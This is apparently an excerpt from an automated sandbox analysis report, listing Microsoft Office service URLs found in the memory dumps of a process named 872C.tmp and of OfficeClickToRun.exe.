    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626-
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626AuthorizationBearer
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626aZ
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/43
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/hod
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonof
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml.Gra
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml.Use
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLosi.office
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comMos1
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comice-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com/
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com79
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excelcs.officeapps.live.com/xlauto/excelautomation.svc/XlAutomationD
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excelsgs.officeapps.live.com/xlfrontdoor/FrontDoor.ashx
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPage.aspx1
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPageV2.aspx?lang=
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/OneNoteMathAddinFunctionPage.aspx43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390088693.0000000003D26000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xmldx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xmls
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/me?api-version=1.68
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/getoembedproviders?type=video&endpoints=1&disp
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/logconfigSource
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/oembedld=16.0.18526&crev=3
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comUI_Uninit3
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comV.Dialogs
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comeatureGate4&
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comrecentt
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059803830.00000248C2D5C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
